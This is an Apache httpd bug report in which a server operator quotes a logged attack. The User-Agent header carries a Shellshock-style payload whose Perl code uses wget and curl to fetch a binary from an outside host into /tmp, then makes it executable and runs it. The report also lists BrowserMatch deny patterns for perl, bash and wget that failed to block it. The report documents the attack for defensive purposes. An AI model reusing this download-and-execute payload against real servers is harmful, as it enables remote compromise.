https://issues.apache.org/bugzilla/show_bug.cgi?id=57580
Bug ID: 57580
Summary: Perl code in "User-Agent" field is being executed and
causing an exploit
Product: Apache httpd-2
Version: 2.4.10
Hardware: PC
OS: Linux
Status: NEW
Severity: critical
Priority: P2
Component: Core
Assignee: [email protected]
Reporter: [email protected]
User-Agent: "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget
http://play.marketplay.eu/apache22 -O /tmp/apache24;curl -O /tmp/apache24
http://play.marketplay.eu/apache22;chmod 777 /tmp/apache24;/tmp/apache24;\");'"
(Outermost quotes added by my log file)
This bug is creating a /tmp/apache24 file, which appears to be a binary where
execution is subsequently attempted. (Whether "suexec" permits or denies the
binary is immaterial to the exploit.)
The problem is the creation of the file from executing the perl code in the
User-Agent string. The file should never be created, because the user-agent
string should never be executed by the system command processor. The perl
system() call should not happen, but it is happening - as the target file in
/tmp is being created. I cannot say if it's the "wget" or "curl" command which
creates the file, nor does that matter.
/tmp:
total 61
drwxrwxrwt 2 root none 60 Feb 12 18:39 .
drwxr-xr-x 22 root none 1024 Dec 10 22:36 ..
-rwxrwxrwx 1 webserv html 61112 Feb 12 03:25 apache24
System: Linux 3.18.6
Server version: Apache/2.4.12 (Unix)
Server built: Feb 9 2015 02:47:36
Server's Module Magic Number: 20120211:41
Server loaded: APR 1.4.2, APR-UTIL 1.3.10
Compiled using: APR 1.4.2, APR-UTIL 1.3.10
Architecture: 64-bit
Server MPM: worker
threaded: yes (fixed thread count)
forked: yes (variable process count)
Server compiled with....
-D APR_HAS_SENDFILE
-D APR_HAS_MMAP
-D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
-D APR_USE_SYSVSEM_SERIALIZE
-D APR_USE_PTHREAD_SERIALIZE
-D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
-D APR_HAS_OTHER_CHILD
-D AP_HAVE_RELIABLE_PIPED_LOGS
-D DYNAMIC_MODULE_LIMIT=256
-D HTTPD_ROOT="/usr"
-D SUEXEC_BIN="/usr/bin/suexec"
-D DEFAULT_PIDLOG="/var/logs/httpd.pid"
-D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
-D DEFAULT_ERRORLOG="logs/error_log"
-D AP_TYPES_CONFIG_FILE="/var/lib/httpd/conf/mime.types"
-D SERVER_CONFIG_FILE="/var/lib/httpd/conf/httpd.conf"
Shutting down the service at http://play.marketplay.eu will not fix the
exploit, as all the author has to do is move to another server.
Attempts to kill the exploit using BrowserMatch statements do not block it.
BrowserMatchNoCase "(system\(|wget\ -O)" no-log virus
BrowserMatchNoCase /bin/(p(erl|ph)|b?a?sh) no-log virus
The "virus" variable is set to 1, but the file still gets created. The HTTP
response code is 400, no-keep-alive.
Exploit: Why is the User-Agent string being executed in the first place?
This bug may be similar to 50561, but I have identified the point of attack.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
